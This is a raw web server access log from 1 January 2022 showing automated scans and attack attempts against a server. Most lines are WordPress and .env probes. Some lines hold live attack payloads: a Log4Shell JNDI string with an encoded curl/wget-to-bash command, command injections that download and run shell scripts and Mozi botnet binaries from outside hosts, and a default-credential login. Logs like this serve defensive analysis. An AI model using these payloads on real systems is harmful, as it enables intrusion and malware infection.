107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
198.98.49.124 - - [01/Jan/2022:01:00:23 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
107.172.73.224 - - [01/Jan/2022:01:01:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:01:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:01:59 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:01:59 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:01:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:00 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:01 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:01 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:01 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:02:01 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
180.149.125.164 - - [01/Jan/2022:01:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:01:13:52 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg3OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODc6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg3OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODc6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg3OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODc6ODApfGJhc2g=}"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:56 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:57 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:58 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:58 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:01:14:58 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
209.141.53.74 - - [01/Jan/2022:01:22:08 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
180.149.125.164 - - [01/Jan/2022:01:25:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.166 - - [01/Jan/2022:01:28:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
172.105.69.5 - - [01/Jan/2022:01:29:18 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
92.112.143.30 - - [01/Jan/2022:01:30:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
13.40.176.50 - - [01/Jan/2022:01:30:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
13.40.176.50 - - [01/Jan/2022:01:30:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
46.236.65.80 - - [01/Jan/2022:01:32:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:01:38:45 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:01:38:45 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
180.149.125.171 - - [01/Jan/2022:01:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
42.194.240.186 - - [01/Jan/2022:01:45:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://205.185.119.11/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
42.194.240.186 - - [01/Jan/2022:01:45:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://205.185.119.11/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
159.223.161.253 - - [01/Jan/2022:01:45:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:01:45:52 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.98.49.124 - - [01/Jan/2022:01:46:09 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
128.1.248.26 - - [01/Jan/2022:01:46:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
43.131.64.139 - - [01/Jan/2022:01:49:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
43.131.64.139 - - [01/Jan/2022:01:49:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.98.49.124 - - [01/Jan/2022:01:52:34 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
104.140.188.6 - - [01/Jan/2022:01:56:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
209.141.53.74 - - [01/Jan/2022:01:58:01 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
74.82.47.2 - - [01/Jan/2022:02:02:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.218.206.68 - - [01/Jan/2022:02:02:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.2 - - [01/Jan/2022:02:06:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.43 - - [01/Jan/2022:02:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.43 - - [01/Jan/2022:02:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
63.151.106.126 - - [01/Jan/2022:02:08:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
63.151.106.126 - - [01/Jan/2022:02:08:15 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
199.117.154.162 - - [01/Jan/2022:02:09:06 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
199.117.154.162 - - [01/Jan/2022:02:09:06 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.131.64.139 - - [01/Jan/2022:02:09:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
43.131.64.139 - - [01/Jan/2022:02:09:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:10:36 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:10:36 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
199.117.154.162 - - [01/Jan/2022:02:10:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
199.117.154.162 - - [01/Jan/2022:02:10:38 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.221.192.90 - - [01/Jan/2022:02:11:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.248.133.113 - - [01/Jan/2022:02:12:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.113 - - [01/Jan/2022:02:12:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.180.143.8 - - [01/Jan/2022:02:18:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.8 - - [01/Jan/2022:02:18:43 +0100] "GET /fuel HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.8 - - [01/Jan/2022:02:18:43 +0100] "GET /fuel/modules/fuel/assets/css/fuel.css HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:20:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:20:03 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:26:44 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:02:26:44 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.206.128.10 - - [01/Jan/2022:02:28:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
65.49.20.67 - - [01/Jan/2022:02:30:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.68 - - [01/Jan/2022:02:36:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.212 - - [01/Jan/2022:02:37:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
209.141.53.74 - - [01/Jan/2022:02:40:47 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.79.222.102 - - [01/Jan/2022:02:41:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1" 404 306 "-" "Hello, world"
35.217.110.25 - - [01/Jan/2022:02:42:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/84.0.4147.105 Safari/537.36"
35.217.110.25 - - [01/Jan/2022:02:42:31 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/84.0.4147.105 Safari/537.36"
45.152.157.44 - - [01/Jan/2022:02:43:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
64.62.197.212 - - [01/Jan/2022:02:47:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
157.245.70.127 - - [01/Jan/2022:02:50:24 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Jan/2022:02:50:24 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
198.98.49.124 - - [01/Jan/2022:02:52:28 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
23.90.160.122 - - [01/Jan/2022:02:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.98.49.124 - - [01/Jan/2022:02:55:50 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
159.223.169.7 - - [01/Jan/2022:03:03:35 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.169.7 - - [01/Jan/2022:03:03:35 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.9 - - [01/Jan/2022:03:04:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
184.105.139.70 - - [01/Jan/2022:03:05:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.66 - - [01/Jan/2022:03:07:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
61.52.244.196 - - [01/Jan/2022:03:08:24 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
167.94.138.113 - - [01/Jan/2022:03:08:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.113 - - [01/Jan/2022:03:08:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.98.49.124 - - [01/Jan/2022:03:09:12 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
120.85.113.12 - - [01/Jan/2022:03:10:27 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
193.23.3.121 - - [01/Jan/2022:03:11:33 +0100] "CONNECT ver.movistarplus.es:443 HTTP/1.1" 405 349 "-" "Java/1.8.0_311"
198.98.49.124 - - [01/Jan/2022:03:14:48 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
159.223.169.7 - - [01/Jan/2022:03:17:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.169.7 - - [01/Jan/2022:03:17:02 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
184.105.139.69 - - [01/Jan/2022:03:18:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.208.144 - - [01/Jan/2022:03:19:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.208.144 - - [01/Jan/2022:03:19:18 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
172.104.138.223 - - [01/Jan/2022:03:35:17 +0100] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
109.237.103.9 - - [01/Jan/2022:03:47:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.28.87.68 - - [01/Jan/2022:03:55:21 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.28.87.68 - - [01/Jan/2022:03:55:22 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.28.87.68 - - [01/Jan/2022:03:58:04 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.28.87.68 - - [01/Jan/2022:03:58:05 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
